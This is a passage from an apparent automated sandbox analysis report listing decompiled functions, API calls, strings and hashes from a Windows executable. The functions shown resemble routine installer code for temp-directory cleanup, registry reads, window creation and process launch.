                                                            • Associated: 00000006.00000002.318079756.00000000006CC000.00000004.00020000.sdmp
                                                            • Associated: 00000006.00000002.318085304.00000000006CE000.00000008.00020000.sdmp
                                                            • Associated: 00000006.00000002.318091437.00000000006CF000.00000004.00020000.sdmp
                                                            • Associated: 00000006.00000002.318097233.00000000006D4000.00000004.00020000.sdmp
                                                            • Associated: 00000006.00000002.318107258.00000000006D9000.00000008.00020000.sdmp
                                                            • Associated: 00000006.00000002.318112284.00000000006DB000.00000004.00020000.sdmp
                                                            • Associated: 00000006.00000002.318118585.00000000006DC000.00000002.00020000.sdmp
                                                            • Associated: 00000006.00000002.318123129.00000000006DE000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: Wait$CloseCodeExitHandleIdleInputMultipleObjectsProcess
                                                            • String ID:
                                                            • API String ID: 4071923889-0
                                                            • Opcode ID: b2c0e9a815401a59890ae953dc8cc514a32d7d884ad163320893ed3959533c1a
                                                            • Instruction ID: 3bf9388a4eab4805cc6f518967bcd8e0b9f61bd1b59095cebcc575be48bbaf87
                                                            • Opcode Fuzzy Hash: b2c0e9a815401a59890ae953dc8cc514a32d7d884ad163320893ed3959533c1a
                                                            • Instruction Fuzzy Hash: 24012D70A80308BEEB3497A58D16FEBBBADDF45760F510536F604C36C2D5759D40C664
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 86%
                                                            			E006ACABC(signed char __eax, void* __ecx, void* __edx, void* __eflags) {
                                                            				long _t7;
                                                            				void* _t9;
                                                            				void* _t14;
                                                            				void* _t15;
                                                            				signed char* _t16;
                                                            
                                                            				_t17 = __eflags;
                                                            				_push(__ecx);
                                                            				_t14 = __ecx;
                                                            				_t15 = __edx;
                                                            				 *_t16 = __eax;
                                                            				while(1) {
                                                            					E0060C158( *_t16 & 0x000000ff, _t15, _t17); // executed
                                                            					asm("sbb ebx, ebx");
                                                            					_t9 = _t9 + 1;
                                                            					if(_t9 != 0 || GetLastError() == 2 || GetLastError() == 3) {
                                                            						break;
                                                            					}
                                                            					_t7 = GetTickCount();
                                                            					_t17 = _t7 - _t14 - 0x7d0;
                                                            					if(_t7 - _t14 < 0x7d0) {
                                                            						Sleep(0x32);
                                                            						continue;
                                                            					}
                                                            					break;
                                                            				}
                                                            				return _t9;
                                                            			}









                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: ErrorLast$CountSleepTick
                                                            • String ID:
                                                            • API String ID: 2227064392-0
                                                            • Opcode ID: 66301a0a26332de94f541b13cc40e963d91ad8f3bd11375468a19028b1306bfa
                                                            • Instruction ID: 650aecd8dda8324acb9ef1ef12543e615cdaddf0aa48ac4ca6bdf88ba774c7be
                                                            • Opcode Fuzzy Hash: 66301a0a26332de94f541b13cc40e963d91ad8f3bd11375468a19028b1306bfa
                                                            • Instruction Fuzzy Hash: 2AE02B7234838094D725356E58864BE8D5ACFC3376F280A3FF0C4D2182C4058D85C576
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E006AE3C8(long __eax, void* __ecx, void* __fp0) {
                                                            				void* __ebx;
                                                            				void* __ebp;
                                                            				long _t23;
                                                            				intOrPtr _t24;
                                                            				intOrPtr _t28;
                                                            				intOrPtr _t49;
                                                            				intOrPtr _t54;
                                                            				intOrPtr _t59;
                                                            				intOrPtr _t64;
                                                            				intOrPtr* _t69;
                                                            				struct HWND__* _t72;
                                                            				int _t73;
                                                            				intOrPtr _t74;
                                                            				void* _t77;
                                                            				void* _t79;
                                                            				void* _t93;
                                                            				void* _t94;
                                                            				void* _t95;
                                                            				intOrPtr _t98;
                                                            				void* _t100;
                                                            				intOrPtr _t104;
                                                            				intOrPtr _t106;
                                                            				intOrPtr _t107;
                                                            				intOrPtr _t108;
                                                            				intOrPtr _t113;
                                                            				intOrPtr _t116;
                                                            				intOrPtr _t118;
                                                            				intOrPtr _t120;
                                                            				long _t126;
                                                            				void* _t128;
                                                            				void* _t129;
                                                            				void* _t130;
                                                            				void* _t131;
                                                            				void* _t147;
                                                            
                                                            				_t147 = __fp0;
                                                            				_t95 = __ecx;
                                                            				_t23 = __eax;
                                                            				_t126 = __eax;
                                                            				_t131 = _t126 -  *0x6cd738; // 0x0
                                                            				if(_t131 == 0) {
                                                            					L28:
                                                            					return _t23;
                                                            				}
                                                            				_t24 =  *0x6d66f8; // 0x0
                                                            				_t93 = E00464CD0(_t24, __eax);
                                                            				_t1 = _t93 + 0x18; // 0x18
                                                            				_t100 = E0040A77C(_t1);
                                                            				_t28 =  *((intOrPtr*)(_t93 + 0x18));
                                                            				if(_t28 != 0) {
                                                            					_t28 =  *((intOrPtr*)(_t28 - 4));
                                                            				}
                                                            				E005CD600(_t100, _t95, _t28);
                                                            				E005C77C4();
                                                            				E005C77C4();
                                                            				 *0x6cd738 = _t126;
                                                            				_t104 =  *0x5cac34; // 0x5cac38
                                                            				E0040BFAC(0x6d66b8, _t104);
                                                            				_t98 =  *0x5cac34; // 0x5cac38
                                                            				E0040C278(0x6d66b8, _t98, _t93, _t147);
                                                            				if( *0x6d66e0 == 0x411 &&  *0x6d67f0 < 0x5010000 && E005C7F8C(L"MS PGothic", _t93) != 0) {
                                                            					E0040A5A8(0x6d66c8, L"MS PGothic");
                                                            					 *0x6d66ec = 0xc;
                                                            				}
                                                            				if( *((intOrPtr*)(_t93 + 0x1c)) == 0) {
                                                            					_t106 =  *0x6d6601; // 0x0
                                                            					E0040A644(0x6d6744, _t106);
                                                            				} else {
                                                            					E0040A644(0x6d6744,  *((intOrPtr*)(_t93 + 0x1c)));
                                                            				}
                                                            				if( *((intOrPtr*)(_t93 + 0x20)) == 0) {
                                                            					_t107 =  *0x6d6605; // 0x0
                                                            					E0040A644(0x6d6748, _t107);
                                                            				} else {
                                                            					E0040A644(0x6d6748,  *((intOrPtr*)(_t93 + 0x20)));
                                                            				}
                                                            				_t139 =  *((intOrPtr*)(_t93 + 0x24));
                                                            				if( *((intOrPtr*)(_t93 + 0x24)) == 0) {
                                                            					_t108 =  *0x6d6609; // 0x0
                                                            					E0040A644(0x6d674c, _t108);
                                                            				} else {
                                                            					E0040A644(0x6d674c,  *((intOrPtr*)(_t93 + 0x24)));
                                                            				}
                                                            				E005C9044( *0x6d66f4 & 0x000000ff);
                                                            				_t49 =  *0x6cded8; // 0x6d5c28
                                                            				_t10 = _t49 + 0x1e8; // 0x0
                                                            				E005C8FB8(0, _t98, E0040B278( *_t10), _t139);
                                                            				_t54 =  *0x6cded8; // 0x6d5c28
                                                            				_t11 = _t54 + 0xb0; // 0x0
                                                            				E005C8FB8(1, _t98, E0040B278( *_t11), _t139);
                                                            				_t59 =  *0x6cded8; // 0x6d5c28
                                                            				_t12 = _t59 + 0x164; // 0x0
                                                            				E005C8FB8(2, _t98, E0040B278( *_t12), _t139);
                                                            				_t64 =  *0x6cded8; // 0x6d5c28
                                                            				_t13 = _t64 + 0x164; // 0x0
                                                            				E005C8FB8(3, _t98, E0040B278( *_t13), _t139);
                                                            				_t113 =  *0x6cded8; // 0x6d5c28
                                                            				_t14 = _t113 + 0x2f8; // 0x0
                                                            				_t69 =  *0x6cdec4; // 0x6d579c
                                                            				E005B8250( *_t69,  *_t14, _t139);
                                                            				_t23 =  *0x6d6704; // 0x0
                                                            				_t128 =  *((intOrPtr*)(_t23 + 8)) - 1;
                                                            				if(_t128 < 0) {
                                                            					L26:
                                                            					if( *0x6d64a4 == 0) {
                                                            						goto L28;
                                                            					}
                                                            					_t72 =  *0x6d64a8; // 0x120262
                                                            					_t73 = SendNotifyMessageW(_t72, 0x496, 0x2711, _t126); // executed
                                                            					return _t73;
                                                            				} else {
                                                            					_t129 = _t128 + 1;
                                                            					_t130 = 0;
                                                            					do {
                                                            						_t74 =  *0x6d6704; // 0x0
                                                            						_t94 = E00464CD0(_t74, _t130);
                                                            						_t77 = ( *(_t94 + 0x25) & 0x000000ff) - 1;
                                                            						if(_t77 == 0) {
                                                            							_t17 = _t94 + 4; // 0x4
                                                            							_t116 =  *0x6cded8; // 0x6d5c28
                                                            							_t18 = _t116 + 0x1c8; // 0x0
                                                            							_t23 = E0040A5A8(_t17,  *_t18);
                                                            						} else {
                                                            							_t79 = _t77 - 1;
                                                            							if(_t79 == 0) {
                                                            								_t19 = _t94 + 4; // 0x4
                                                            								_t118 =  *0x6cded8; // 0x6d5c28
                                                            								_t20 = _t118 + 0x94; // 0x0
                                                            								_t23 = E0040A5A8(_t19,  *_t20);
                                                            							} else {
                                                            								_t23 = _t79 - 1;
                                                            								if(_t23 == 0) {
                                                            									_t21 = _t94 + 4; // 0x4
                                                            									_t120 =  *0x6cded8; // 0x6d5c28
                                                            									_t22 = _t120 + 0xb8; // 0x0
                                                            									_t23 = E0040A5A8(_t21,  *_t22);
                                                            								}
                                                            							}
                                                            						}
                                                            						_t130 = _t130 + 1;
                                                            						_t129 = _t129 - 1;
                                                            					} while (_t129 != 0);
                                                            					goto L26;
                                                            				}
                                                            			}






































                                                            APIs
                                                            • SendNotifyMessageW.USER32(00120262,00000496,00002711,-00000001), ref: 006AE618
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: MessageNotifySend
                                                            • String ID: (\m$MS PGothic
                                                            • API String ID: 3556456075-219475269
                                                            • Opcode ID: 2500a480fbb503b296a3365eb03bbe38222c632a9ea8e700226d7071bd3521c7
                                                            • Instruction ID: c4b29eded5dd607060819086577383edb80d612be209ecb45f272f1b38c29540
                                                            • Opcode Fuzzy Hash: 2500a480fbb503b296a3365eb03bbe38222c632a9ea8e700226d7071bd3521c7
                                                            • Instruction Fuzzy Hash: 295150347011448BC700FF69D88AE5A77E3EB9A308B54557AF4049F366CA7AEC42CF99
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 73%
                                                            			E0060D530(void* __eax, long __ebx, void* __edx, void* __edi, void* __esi) {
                                                            				char _v8;
                                                            				char _v12;
                                                            				char* _v16;
                                                            				char _v20;
                                                            				intOrPtr _v24;
                                                            				char _v28;
                                                            				char _v32;
                                                            				char _v36;
                                                            				char _v40;
                                                            				int _t30;
                                                            				intOrPtr _t63;
                                                            				void* _t71;
                                                            				void* _t73;
                                                            				intOrPtr _t75;
                                                            				intOrPtr _t76;
                                                            
                                                            				_t71 = __edi;
                                                            				_t54 = __ebx;
                                                            				_t75 = _t76;
                                                            				_t55 = 4;
                                                            				do {
                                                            					_push(0);
                                                            					_push(0);
                                                            					_t55 = _t55 - 1;
                                                            				} while (_t55 != 0);
                                                            				_push(_t55);
                                                            				_push(__ebx);
                                                            				_t73 = __eax;
                                                            				_t78 = 0;
                                                            				_push(_t75);
                                                            				_push(0x60d629);
                                                            				_push( *[fs:eax]);
                                                            				 *[fs:eax] = _t76;
                                                            				while(1) {
                                                            					E005C75E4( &_v12, _t54, _t55, _t78); // executed
                                                            					_t55 = L".tmp";
                                                            					E0060D294(0, _t54, L".tmp", _v12, _t71, _t73,  &_v8); // executed
                                                            					_t30 = CreateDirectoryW(E0040B278(_v8), 0); // executed
                                                            					if(_t30 != 0) {
                                                            						break;
                                                            					}
                                                            					_t54 = GetLastError();
                                                            					_t78 = _t54 - 0xb7;
                                                            					if(_t54 != 0xb7) {
                                                            						E005CD508(0x3d,  &_v32, _v8);
                                                            						_v28 = _v32;
                                                            						E0042302C( &_v36, _t54, 0);
                                                            						_v24 = _v36;
                                                            						E005C857C(_t54,  &_v40);
                                                            						_v20 = _v40;
                                                            						E005CD4D8(0x81, 2,  &_v28,  &_v16);
                                                            						_t55 = _v16;
                                                            						E00429008(_v16, 1);
                                                            						E004098C4();
                                                            					}
                                                            				}
                                                            				E0040A5A8(_t73, _v8);
                                                            				__eflags = 0;
                                                            				_pop(_t63);
                                                            				 *[fs:eax] = _t63;
                                                            				_push(E0060D630);
                                                            				E0040A228( &_v40, 3);
                                                            				return E0040A228( &_v16, 3);
                                                            			}


















                                                            APIs
                                                            • CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,0060D629,?,006D579C,?,00000003,00000000,00000000,?,006AC8F3,00000000,006ACA22), ref: 0060D578
                                                            • GetLastError.KERNEL32(00000000,00000000,?,00000000,0060D629,?,006D579C,?,00000003,00000000,00000000,?,006AC8F3,00000000,006ACA22), ref: 0060D581
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: CreateDirectoryErrorLast
                                                            • String ID: .tmp
                                                            • API String ID: 1375471231-2986845003
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 78%
                                                            			E0060F338(void* __eax, void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi, void* __fp0, intOrPtr* _a4, void* _a8, intOrPtr _a12, signed char _a16, char _a20) {
                                                            				intOrPtr _v8;
                                                            				struct _SHELLEXECUTEINFOW _v68;
                                                            				void* _t52;
                                                            				intOrPtr _t61;
                                                            				void* _t65;
                                                            				intOrPtr* _t67;
                                                            				void* _t70;
                                                            
                                                            				_v8 = __ecx;
                                                            				_t65 = __edx;
                                                            				_t52 = __eax;
                                                            				_t67 = _a4;
                                                            				E0040A2AC(_a20);
                                                            				_push(_t70);
                                                            				_push(0x60f41c);
                                                            				_push( *[fs:eax]);
                                                            				 *[fs:eax] = _t70 + 0xffffffc0;
                                                            				if(_a20 == 0) {
                                                            					E005C5378(_t65, __ecx,  &_a20);
                                                            					if(_a20 == 0) {
                                                            						E005C745C( &_a20);
                                                            					}
                                                            				}
                                                            				E00407760( &_v68, 0x3c);
                                                            				_v68.cbSize = 0x3c;
                                                            				_v68.fMask = 0x540;
                                                            				if(_t52 != 0) {
                                                            					_v68.lpVerb = E0040B278(_t52);
                                                            				}
                                                            				_v68.lpFile = E0040B278(_t65);
                                                            				_v68.lpParameters = E0040B278(_v8);
                                                            				_v68.lpDirectory = E0040B278(_a20);
                                                            				_v68.nShow = _a12;
                                                            				ShellExecuteExW( &_v68); // executed
                                                            				asm("sbb ebx, ebx");
                                                            				_t53 = _t52 + 1;
                                                            				if(_t52 + 1 != 0) {
                                                            					 *_t67 = 0x103;
                                                            					_t39 = _v68.hProcess;
                                                            					if(_v68.hProcess != 0) {
                                                            						E0060EFD8(_t39, _t53, _a16 & 0x000000ff, _t65, _t67, _t67); // executed
                                                            					}
                                                            				} else {
                                                            					 *_t67 = GetLastError();
                                                            				}
                                                            				_pop(_t61);
                                                            				 *[fs:eax] = _t61;
                                                            				_push(E0060F423);
                                                            				return E0040A1C8( &_a20);
                                                            			}










                                                            APIs
                                                            • ShellExecuteExW.SHELL32(0000003C), ref: 0060F3D4
                                                            • GetLastError.KERNEL32(00000000,0060F41C,?,?,?,00000001), ref: 0060F3E3
                                                              • Part of subcall function 005C745C: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 005C746F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: DirectoryErrorExecuteLastShellSystem
                                                            • String ID: <
                                                            • API String ID: 893404051-4251816714
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 70%
                                                            			E006ACB10(void* __ebx, void* __edx, void* __edi, void* __esi) {
                                                            				char _v8;
                                                            				char* _t12;
                                                            				long _t13;
                                                            				void* _t15;
                                                            				void* _t22;
                                                            				intOrPtr _t26;
                                                            				intOrPtr _t28;
                                                            				intOrPtr _t29;
                                                            				void* _t31;
                                                            				void* _t32;
                                                            				intOrPtr _t35;
                                                            
                                                            				_t32 = __esi;
                                                            				_t31 = __edi;
                                                            				_t22 = __ebx;
                                                            				_push(0);
                                                            				_push(_t35);
                                                            				_push(0x6acba2);
                                                            				_push( *[fs:eax]);
                                                            				 *[fs:eax] = _t35;
                                                            				E006255B8(0);
                                                            				E006255A4(0);
                                                            				if( *0x6d6530 != 0) {
                                                            					_t12 =  *0x6cdfdc; // 0x6d62e4
                                                            					if( *_t12 != 0) {
                                                            						E0061583C(0);
                                                            					}
                                                            					_t13 = GetTickCount();
                                                            					_t29 =  *0x6d6530; // 0x0
                                                            					_t15 = E0060DCC8(0, _t22, 1, _t29, _t13, E006ACABC, 0, 0, 1, 1); // executed
                                                            					if(_t15 == 0) {
                                                            						_t26 =  *0x6d6530; // 0x0
                                                            						E0040B4C8( &_v8, _t26, L"Failed to remove temporary directory: ");
                                                            						E00616130(_v8, _t22, _t31, _t32);
                                                            					}
                                                            				}
                                                            				_pop(_t28);
                                                            				 *[fs:eax] = _t28;
                                                            				_push(E006ACBA9);
                                                            				return E0040A1C8( &_v8);
                                                            			}














                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: CountTick
                                                            • String ID: Failed to remove temporary directory: $bm
                                                            • API String ID: 536389180-2673898769
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E006AC180() {
                                                            				void* _v8;
                                                            				void* __ecx;
                                                            				void* _t9;
                                                            				long _t15;
                                                            				void* _t16;
                                                            
                                                            				if( *0x6d67dd == 0) {
                                                            					_t16 = 0;
                                                            				} else {
                                                            					_t16 = 2;
                                                            				}
                                                            				_t9 = E005C7A14(_t16,  *((intOrPtr*)(0x6cd7ec + ( *0x6d67dc & 0x000000ff) * 4)), 0x80000002,  &_v8, 1, 0); // executed
                                                            				if(_t9 == 0) {
                                                            					E005C793C();
                                                            					E005C793C();
                                                            					_t15 = RegCloseKey(_v8); // executed
                                                            					return _t15;
                                                            				}
                                                            				return _t9;
                                                            			}









                                                            APIs
                                                            • RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,006AC56B,00000000,006AC586,?,00000000,00000000,?,006B7B68,00000006), ref: 006AC1E2
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: Close
                                                            • String ID: RegisteredOrganization$RegisteredOwner
                                                            • API String ID: 3535843008-1113070880
                                                            • Opcode ID: bd898d473dd1f21ff1d6f1f73f3955f0af61235c1559c7df92e3e59f0577a32c
                                                            • Instruction ID: ca4fc0b31771868649da923643cba903dbb3fbd6f1f7080981924f9495942079
                                                            • Opcode Fuzzy Hash: bd898d473dd1f21ff1d6f1f73f3955f0af61235c1559c7df92e3e59f0577a32c
                                                            • Instruction Fuzzy Hash: E8F09030744108AFE700EAD4DC56BAA7B9FE787714F60106AF1008BB82C630AE00CF54
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E00414DA0(long __eax, WCHAR* __edx, void* _a4, struct HINSTANCE__* _a8, struct HMENU__* _a12, struct HWND__* _a16, int _a20, int _a24, int _a28, int _a32, long _a36) {
                                                            				WCHAR* _v8;
                                                            				void* _t13;
                                                            				struct HWND__* _t24;
                                                            				WCHAR* _t29;
                                                            				long _t32;
                                                            
                                                            				_v8 = _t29;
                                                            				_t32 = __eax;
                                                            				_t13 = E00407404();
                                                            				_t24 = CreateWindowExW(_t32, __edx, _v8, _a36, _a32, _a28, _a24, _a20, _a16, _a12, _a8, _a4); // executed
                                                            				E004073F4(_t13);
                                                            				return _t24;
                                                            			}









                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: CreateWindow
                                                            • String ID: TWindowDisabler-Window
                                                            • API String ID: 716092398-1824977358
                                                            • Opcode ID: b8b775b51f73ca30bac71de3a5aa2dd226752c973776daaf732847dd1bb66243
                                                            • Instruction ID: a9fb6cbc93b7d8fca137cee03195aa1e05eb631c50c99d8148995e53eb0ae486
                                                            • Opcode Fuzzy Hash: b8b775b51f73ca30bac71de3a5aa2dd226752c973776daaf732847dd1bb66243
                                                            • Instruction Fuzzy Hash: 7BF092B2604158BF9B80DE9DDC81EDB77ECEB4D2A4B05416AFA0CE3201D634ED118BA4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E006AC0D0(void* __eax, void* __edx, void* __eflags) {
                                                            				void* _v8;
                                                            				void* __ecx;
                                                            				void* _t7;
                                                            				void* _t17;
                                                            				void* _t24;
                                                            
                                                            				_t24 = _t17;
                                                            				_t7 = E005C7A14(__eax, L"Software\\Microsoft\\Windows\\CurrentVersion", 0x80000002,  &_v8, 1, 0); // executed
                                                            				if(_t7 != 0) {
                                                            					return E0040A1C8(_t24);
                                                            				}
                                                            				if(E005C793C() == 0) {
                                                            					E0040A1C8(_t24);
                                                            				}
                                                            				return RegCloseKey(_v8);
                                                            			}









                                                            APIs
                                                              • Part of subcall function 005C7A14: RegOpenKeyExW.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,005C80EE,?,00000000,?,005C808E,00000001,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,005C80EE), ref: 005C7A30
                                                            • RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,006B813A,?,006AC32E,00000000,006AC586,?,00000000,00000000), ref: 006AC115
                                                            Strings
                                                            • Software\Microsoft\Windows\CurrentVersion, xrefs: 006AC0E7
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: CloseOpen
                                                            • String ID: Software\Microsoft\Windows\CurrentVersion
                                                            • API String ID: 47109696-1019749484
                                                            • Opcode ID: d229eceb27129c019e3bbbd4ff4b76b51703ff84893012891c3f6baec18ca04a
                                                            • Instruction ID: 9fe961e3a0f1dd2c49f778430c2599f74e8698f8579e7211867226b13b49c2b0
                                                            • Opcode Fuzzy Hash: d229eceb27129c019e3bbbd4ff4b76b51703ff84893012891c3f6baec18ca04a
                                                            • Instruction Fuzzy Hash: 8FF082317042186BEA04B69E6C52BAEA69D9B86764F60007EF608D7283D9A49E0107A9
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E005C7A14(void* __eax, short* __ecx, void* __edx, void** _a4, int _a8, int _a12) {
                                                            				long _t7;
                                                            				short* _t8;
                                                            				void* _t9;
                                                            				int _t10;
                                                            
                                                            				_t9 = __edx;
                                                            				_t8 = __ecx;
                                                            				_t10 = _a8;
                                                            				if(__eax == 2) {
                                                            					_t10 = _t10 | 0x00000100;
                                                            				}
                                                            				_t7 = RegOpenKeyExW(_t9, _t8, _a12, _t10, _a4); // executed
                                                            				return _t7;
                                                            			}








                                                            APIs
                                                            • RegOpenKeyExW.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,005C80EE,?,00000000,?,005C808E,00000001,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,005C80EE), ref: 005C7A30
                                                            Strings
                                                            • Control Panel\Desktop\ResourceLocale, xrefs: 005C7A2E
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: Open
                                                            • String ID: Control Panel\Desktop\ResourceLocale
                                                            • API String ID: 71445658-1109908249
                                                            • Opcode ID: 06a7132f66d0f60adfa239dc575e30208fbe0ee06a5a11f688fbfd3b74e0f472
                                                            • Instruction ID: f7a531ddb9cdcc56bc9141aac83b8570c2bea4ceb2af7b348951fcc1ebd06380
                                                            • Opcode Fuzzy Hash: 06a7132f66d0f60adfa239dc575e30208fbe0ee06a5a11f688fbfd3b74e0f472
                                                            • Instruction Fuzzy Hash: C3D0C97291022C7B9B009ED9DC41EFB7B9DEB19360F40845AFD0897100C2B4EDA18BF4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 63%
                                                            			E0060DCC8(signed int __eax, void* __ebx, char __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, signed char _a12, signed int _a16, signed int _a20, char _a24) {
                                                            				char _v8;
                                                            				char _v12;
                                                            				char _v16;
                                                            				signed int _v17;
                                                            				intOrPtr _v24;
                                                            				char _v25;
                                                            				signed int _v26;
                                                            				void* _v32;
                                                            				struct _WIN32_FIND_DATAW _v624;
                                                            				char _v628;
                                                            				char _v632;
                                                            				char _v636;
                                                            				char _v640;
                                                            				signed char _t106;
                                                            				signed char _t108;
                                                            				void* _t114;
                                                            				int _t122;
                                                            				signed int _t127;
                                                            				signed char _t135;
                                                            				signed char _t139;
                                                            				void* _t155;
                                                            				signed int _t158;
                                                            				intOrPtr _t177;
                                                            				intOrPtr _t187;
                                                            				void* _t201;
                                                            				void* _t202;
                                                            				intOrPtr _t203;
                                                            
                                                            				_t159 = __ecx;
                                                            				_t201 = _t202;
                                                            				_t203 = _t202 + 0xfffffd84;
                                                            				_push(__ebx);
                                                            				_v640 = 0;
                                                            				_v636 = 0;
                                                            				_v632 = 0;
                                                            				_v628 = 0;
                                                            				_v8 = 0;
                                                            				_v12 = 0;
                                                            				_v16 = 0;
                                                            				_v25 = __ecx;
                                                            				_v24 = __edx;
                                                            				_v17 = __eax;
                                                            				_push(_t201);
                                                            				_push(0x60df66);
                                                            				_push( *[fs:eax]);
                                                            				 *[fs:eax] = _t203;
                                                            				_v26 = 1;
                                                            				if(_a24 == 0) {
                                                            					L26:
                                                            					__eflags = _a16 & 0x000000ff ^ 0x00000001 | _v26;
                                                            					if((_a16 & 0x000000ff ^ 0x00000001 | _v26) != 0) {
                                                            						__eflags = _v25;
                                                            						if(_v25 != 0) {
                                                            							__eflags = _a12;
                                                            							if(__eflags == 0) {
                                                            								_t106 = E0060C664(_v17 & 0x000000ff, _v24, __eflags); // executed
                                                            								__eflags = _t106;
                                                            								if(_t106 == 0) {
                                                            									_v26 = 0;
                                                            								}
                                                            							} else {
                                                            								_t108 = _a12();
                                                            								__eflags = _t108;
                                                            								if(_t108 == 0) {
                                                            									_v26 = 0;
                                                            								}
                                                            							}
                                                            						}
                                                            					}
                                                            					__eflags = 0;
                                                            					_pop(_t177);
                                                            					 *[fs:eax] = _t177;
                                                            					_push(E0060DF6D);
                                                            					E0040A228( &_v640, 4);
                                                            					return E0040A228( &_v16, 3);
                                                            				} else {
                                                            					_t205 = _v25;
                                                            					if(_v25 == 0) {
                                                            						L3:
                                                            						_t207 = _v25;
                                                            						if(_v25 == 0) {
                                                            							E005C5428(_v24, _t159,  &_v8);
                                                            							E0040A5F0( &_v12, _v24);
                                                            						} else {
                                                            							E005C4EA4(_v24,  &_v8);
                                                            							E0040B4C8( &_v12, 0x60df84, _v8);
                                                            						}
                                                            						_t114 = E0060C2B0(_v17 & 0x000000ff,  &_v624, _v12, _t207); // executed
                                                            						_v32 = _t114;
                                                            						if(_v32 == 0xffffffff) {
                                                            							goto L26;
                                                            						} else {
                                                            							_push(_t201);
                                                            							_push(0x60def2);
                                                            							_push( *[fs:eax]);
                                                            							 *[fs:eax] = _t203;
                                                            							do {
                                                            								E0040B318( &_v16, 0x104,  &(_v624.cFileName));
                                                            								E0040B660(_v16, 0x60df94);
                                                            								if(0 != 0) {
                                                            									_t127 = E0040B660(_v16, 0x60dfa4);
                                                            									if(0 != 0) {
                                                            										_t158 = _v624.dwFileAttributes;
                                                            										if((_t158 & 0x00000001) != 0 && (_t127 & 0xffffff00 | (_t158 & 0x00000010) == 0x00000000 | _a20) != 0) {
                                                            											E0040B4C8( &_v628, _v16, _v8);
                                                            											E0060C6DC(_v17 & 0x000000ff, _t158 & 0xfffffffe, _v628, _t158 & 0xfffffffe);
                                                            										}
                                                            										if((_v624.dwFileAttributes & 0x00000010) != 0) {
                                                            											__eflags = _a20;
                                                            											if(_a20 != 0) {
                                                            												E0040B4C8( &_v640, _v16, _v8);
                                                            												_t135 = E0060DCC8(_v17 & 0x000000ff, _t158, 1, _v640, _a4, _a8, _a12, _a16 & 0x000000ff, 1, 1); // executed
                                                            												__eflags = _t135;
                                                            												if(_t135 == 0) {
                                                            													_v26 = 0;
                                                            												}
                                                            											}
                                                            										} else {
                                                            											if(_a8 == 0) {
                                                            												E0040B4C8( &_v636, _v16, _v8);
                                                            												_t139 = E0060C158(_v17 & 0x000000ff, _v636, __eflags);
                                                            												__eflags = _t139;
                                                            												if(_t139 == 0) {
                                                            													_v26 = 0;
                                                            												}
                                                            											} else {
                                                            												E0040B4C8( &_v632, _v16, _v8);
                                                            												if(_a8() == 0) {
                                                            													_v26 = 0;
                                                            												}
                                                            											}
                                                            										}
                                                            									}
                                                            								}
                                                            								if(_a16 == 0 || _v26 != 0) {
                                                            									goto L24;
                                                            								}
                                                            								break;
                                                            								L24:
                                                            								_t122 = FindNextFileW(_v32,  &_v624); // executed
                                                            							} while (_t122 != 0);
                                                            							_pop(_t187);
                                                            							 *[fs:eax] = _t187;
                                                            							_push(E0060DEF9);
                                                            							return FindClose(_v32);
                                                            						}
                                                            					} else {
                                                            						_t155 = E0060C474(_v17 & 0x000000ff, _v24, _t205); // executed
                                                            						if(_t155 == 0) {
                                                            							goto L26;
                                                            						} else {
                                                            							goto L3;
                                                            						}
                                                            					}
                                                            				}
                                                            			}


                                                            APIs
